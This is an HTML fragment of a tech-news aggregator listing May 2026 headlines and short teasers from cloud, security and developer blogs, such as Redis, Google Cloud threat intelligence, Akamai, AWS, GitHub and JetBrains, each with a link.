          📄 What is a context layer? AI agent infrastructure
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-what-is-a-context-layer-ai-agent-infrastructure"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>In a demo, your agent only has to hold one conversation with one user, against fresh data, for a few minutes. Production is different. It has to remember users across sessions, reconcile retrieved doc</p>
<p><strong>📅 May 19, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/what-is-a-context-layer/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-platforms" class="group relative scroll-mt-24">
        <a href="#h2-platforms" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🌐 Platforms
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-platforms"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-2-phaas-2-furious-the-evolution-of-chinese-language-phishing-services" class="group relative scroll-mt-24">
        <a href="#h3-2-phaas-2-furious-the-evolution-of-chinese-language-phishing-services" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 2 PhaaS 2 Furious: The Evolution of Chinese-language Phishing Services
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-2-phaas-2-furious-the-evolution-of-chinese-language-phishing-services"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Written by: Jamie Collier While Russian-speaking threat actors have historically dominated the phishing-as-a-service (PhaaS) landscape, a rival ecosystem is rapidly growing within the Chinese-language</p>
<p><strong>📅 May 25, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/topics/threat-intelligence/chinese-language-phishing-services/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-keep-your-tech-flame-alive-trailblazer-rachel-bayley" class="group relative scroll-mt-24">
        <a href="#h3-keep-your-tech-flame-alive-trailblazer-rachel-bayley" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Keep Your Tech Flame Alive: Trailblazer Rachel Bayley
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-keep-your-tech-flame-alive-trailblazer-rachel-bayley"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>In this Akamai FLAME Trailblazer blog post, Rachel Bayley encourages women to step into the unknown and to be their authentic selves.</p>
<p><strong>📅 May 25, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/culture/2024/may/keep-your-tech-flame-alive-trailblazer-rachel-bayley"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-oracle-of-delphi-will-steal-your-credentials" class="group relative scroll-mt-24">
        <a href="#h3-the-oracle-of-delphi-will-steal-your-credentials" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Oracle of Delphi Will Steal Your Credentials
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-oracle-of-delphi-will-steal-your-credentials"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Our deception technology is able to reroute attackers into honeypots, where they believe that they found their real target. The attacks brute forced passwords for RDP credentials to connect to the vic</p>
<p><strong>📅 May 25, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/the-oracle-of-delphi-steal-your-credentials"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-nansh0u-campaign-hackers-arsenal-grows-stronger" class="group relative scroll-mt-24">
        <a href="#h3-the-nansh0u-campaign-hackers-arsenal-grows-stronger" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Nansh0u Campaign – Hackers Arsenal Grows Stronger
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-nansh0u-campaign-hackers-arsenal-grows-stronger"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>In the beginning of April, three attacks detected in the Guardicore Global Sensor Network (GGSN) caught our attention. All three had source IP addresses originating in South-Africa and hosted by Volum</p>
<p><strong>📅 May 25, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/the-nansh0u-campaign-hackers-arsenal-grows-stronger"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-amazon-sagemaker-expands-domain-management-across-domain-types" class="group relative scroll-mt-24">
        <a href="#h3-amazon-sagemaker-expands-domain-management-across-domain-types" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Amazon SageMaker expands domain management across domain types
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-amazon-sagemaker-expands-domain-management-across-domain-types"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Amazon SageMaker Unified Studio now provides domain management experience for Identity Center and IAM-based domains outside of AWS console, allows administrators and data management teams to create an</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/05/domain-management-iam-idc/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-new-agentic-migration-assessment-capabilities-now-available-with-aws-transform" class="group relative scroll-mt-24">
        <a href="#h3-new-agentic-migration-assessment-capabilities-now-available-with-aws-transform" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 New agentic migration assessment capabilities now available with AWS Transform
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-new-agentic-migration-assessment-capabilities-now-available-with-aws-transform"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>AWS Transform now offers advanced migration assessment capabilities including what-if scenarios, customizable assumptions, flexible file format support, and multiple new total cost of ownership (TCO) </p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/05/assessment-capabilities-transform"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-amazon-sagemaker-adds-business-metadata-and-governance-in-iam-based-domains" class="group relative scroll-mt-24">
        <a href="#h3-amazon-sagemaker-adds-business-metadata-and-governance-in-iam-based-domains" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Amazon SageMaker adds business metadata and governance in IAM-based domains
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-amazon-sagemaker-adds-business-metadata-and-governance-in-iam-based-domains"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Amazon SageMaker Unified Studio now supports business context, metadata and data governance capabilities in IAM-based domains. With this launch, customers using Amazon SageMaker IAM-based domains can </p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/05/sagemaker-catalog-iam-domains/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-request-based-autoscaling-is-now-generally-available-on-app-platform" class="group relative scroll-mt-24">
        <a href="#h3-request-based-autoscaling-is-now-generally-available-on-app-platform" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Request-Based Autoscaling Is Now Generally Available on App Platform
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-request-based-autoscaling-is-now-generally-available-on-app-platform"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Traffic doesn’t spike on a schedule. A product launch, a viral moment, or a flash sale can send request volume through the roof in seconds, long before your CPU metrics catch up. That gap is where per</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 DigitalOcean Blog</strong></p>
<p><a href="https://www.digitalocean.com/blog/request-based-autoscaling-app-platform"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-github-recognized-as-a-leader-in-the-gartner-magic-quadrant-for-enterprise-ai-coding-agents-for-the-third-year-in-a-row" class="group relative scroll-mt-24">
        <a href="#h3-github-recognized-as-a-leader-in-the-gartner-magic-quadrant-for-enterprise-ai-coding-agents-for-the-third-year-in-a-row" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitHub recognized as a Leader in the Gartner® Magic Quadrant™ for Enterprise AI Coding Agents for the third year in a row
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-github-recognized-as-a-leader-in-the-gartner-magic-quadrant-for-enterprise-ai-coding-agents-for-the-third-year-in-a-row"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>We are committed to empowering every developer by building an open, secure, and AI-powered platform that defines the future of software development. The post GitHub recognized as a Leader in the Gartn</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/ai-and-ml/github-copilot/github-recognized-as-a-leader-in-the-gartner-magic-quadrant-for-enterprise-ai-coding-agents-for-the-third-year-in-a-row/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-whats-new-with-google-cloud" class="group relative scroll-mt-24">
        <a href="#h3-whats-new-with-google-cloud" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What’s new with Google Cloud
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-whats-new-with-google-cloud"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Want to know the latest from Google Cloud? Find it here in one handy location. Check back regularly for our newest updates, announcements, resources, events, learning opportunities, and more. Tip: Not</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/topics/inside-google-cloud/whats-new-google-cloud/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-blueprint-how-movix-fills-a-gap-in-dental-skills-with-specialized-agentic-ai" class="group relative scroll-mt-24">
        <a href="#h3-the-blueprint-how-movix-fills-a-gap-in-dental-skills-with-specialized-agentic-ai" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Blueprint: How Movix fills a gap in dental skills with specialized agentic AI
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-blueprint-how-movix-fills-a-gap-in-dental-skills-with-specialized-agentic-ai"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Welcome to The Blueprint, a regular feature where we highlight how Google Cloud customers are tackling unique and common challenges across industries using the latest AI and cloud technologies. We hop</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/topics/startups/filling-the-gaps-in-dental-skills-with-specialized-agentic-ai/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-canonical-announces-fully-managed-kubeflow-ai-operations-platform-on-the-microsoft-azure-marketplace" class="group relative scroll-mt-24">
        <a href="#h3-canonical-announces-fully-managed-kubeflow-ai-operations-platform-on-the-microsoft-azure-marketplace" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Canonical announces fully Managed Kubeflow AI operations platform on the Microsoft Azure Marketplace
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-canonical-announces-fully-managed-kubeflow-ai-operations-platform-on-the-microsoft-azure-marketplace"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Canonical has announced the general availability of Managed Kubeflow on the Microsoft Azure Marketplace. This fully managed MLOps platform allows enterprise AI teams to deploy a production-ready envir</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/managed-kubeflow-microsoft-azure-canonical-release"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-misc" class="group relative scroll-mt-24">
        <a href="#h2-misc" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📰 Misc
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-misc"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-visual-studio-code-1122" class="group relative scroll-mt-24">
        <a href="#h3-visual-studio-code-1122" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Visual Studio Code 1.122
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-visual-studio-code-1122"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Learn what&#39;s new in Visual Studio Code 1.122 (Insiders) Read the full article</p>
<p><strong>📅 May 27, 2026</strong> • <strong>📰 VS Code Blog</strong></p>
<p><a href="https://code.visualstudio.com/updates/v1_122"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-how-jaeger-hit-86-compression-on-10-million-spans-with-clickhouse" class="group relative scroll-mt-24">
        <a href="#h3-how-jaeger-hit-86-compression-on-10-million-spans-with-clickhouse" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 How Jaeger hit 8.6× compression on 10 million spans with ClickHouse
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-how-jaeger-hit-86-compression-on-10-million-spans-with-clickhouse"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>As someone who’s been maintaining Jaeger, I’ve watched users request ClickHouse support consistently over the past few years. With Jaeger The post How Jaeger hit 8.6× compression on 10 million spans w</p>
<p><strong>📅 May 24, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/jaeger-clickhouse-storage-backend/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-what-clickhouse-learned-from-a-year-of-coding-with-ai-agents" class="group relative scroll-mt-24">
        <a href="#h3-what-clickhouse-learned-from-a-year-of-coding-with-ai-agents" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What ClickHouse learned from a year of coding with AI agents
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-what-clickhouse-learned-from-a-year-of-coding-with-ai-agents"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Some people will tell you agents will take all our jobs. Others insist they are useless. Leadership at many companies The post What ClickHouse learned from a year of coding with AI agents appeared fir</p>
<p><strong>📅 May 24, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/clickhouse-ai-coding-agents/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-openclaw-passed-300000-github-stars-then-google-launched-spark" class="group relative scroll-mt-24">
        <a href="#h3-openclaw-passed-300000-github-stars-then-google-launched-spark" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 OpenClaw passed 300,000 GitHub stars. Then Google launched Spark.
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-openclaw-passed-300000-github-stars-then-google-launched-spark"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>OpenClaw made the always-on agent feel personal by making it live somewhere you could point at — a Mac mini The post OpenClaw passed 300,000 GitHub stars. Then Google launched Spark. appeared first on</p>
<p><strong>📅 May 23, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/gemini-spark-vs-openclaw/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-jetbrains-fit-test-is-this-the-right-workplace-for-you" class="group relative scroll-mt-24">
        <a href="#h3-the-jetbrains-fit-test-is-this-the-right-workplace-for-you" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The JetBrains Fit Test: Is This the Right Workplace for You?
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-jetbrains-fit-test-is-this-the-right-workplace-for-you"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>If you’ve ever wondered what it’s really like to work at JetBrains, this post is for you. We could tell you about our products, our offices, or the number of developers who use our tools, but the trut</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/life-at-jetbrains/2026/05/the-jetbrains-fit-test-is-this-the-right-workplace-for-you/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-what-happens-when-you-give-ai-agents-the-map-of-your-codes-coverage" class="group relative scroll-mt-24">
        <a href="#h3-what-happens-when-you-give-ai-agents-the-map-of-your-codes-coverage" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What Happens When You Give AI Agents the Map of Your Code’s Coverage?
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-what-happens-when-you-give-ai-agents-the-map-of-your-codes-coverage"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>When you ask an AI agent to write a new feature, a good agent will eventually say: “I need to write a test for this.” But what happens next is usually messy. To figure out where that new test belongs,</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/dotnet/2026/05/22/claude-codex-ai-agent-skill-for-writing-tests/"><strong>🔗 Read more</strong></a></p>
